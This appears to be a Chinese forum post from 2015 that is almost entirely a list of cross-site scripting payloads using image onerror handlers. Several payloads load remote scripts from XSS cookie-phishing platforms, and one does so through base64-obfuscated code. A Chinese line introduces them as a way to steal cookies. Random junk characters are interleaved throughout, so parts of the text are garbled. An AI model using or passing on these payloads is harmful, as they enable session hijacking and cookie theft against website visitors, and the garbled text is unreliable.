<img src='non-exist.jpg'onerror="alert('xss')">
) k' @) t" [$ V9 E6 k8 e: x/ `% r9 i6 o<img src=# onerror=alert(123)>
0 D# W" \* Z# N Z# m8 P# E7 w<img src=# onerror=alert(document.cookie)>
5 o. d! H* _) \9 H% ]下面是利用平台钓cookie的+ @) o+ t' ?( X4 y# u; b" \) a
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>* D- |+ K/ W; p# W6 C
& o8 @1 B1 N' ~+ H4 l) I1 ~
1 g5 O1 }! l. }
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
" K( b' e% h i1 v: T2 l/ E8 F c<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
6 ^& Z6 q: ?5 Q: e, V& x& y' R, n“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>$ P B' B a; Q, `2 @
<img src=1 onerror=jQuery.getScript("//xss.re/974")> . @4 M" l/ ?# Z
<img src="#">- h- R9 c6 n1 ?% ?/ w) b
<img src="#">
' H& o) }- W' w8 [<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>0 }0 W; \/ L' Z. a0 T2 ^" x
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">8 }& D* v5 N+ H$ G0 d
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
5 E) D6 O- m' `* H/ q<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>8 G/ j# n4 _& O# [0 p5 r' v
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
: r4 a' n, b9 Z c5 T7 H4 h<img src=x width="0" height="0"></img>6 J, [3 T8 w! _5 ?: x9 q
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>8 Q* ]) A4 A- u/ e6 G+ y
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>3 H) w5 Q x& S! o% f9 A
|
发表于 2015-10-18 14:33:54
收藏
支持
反对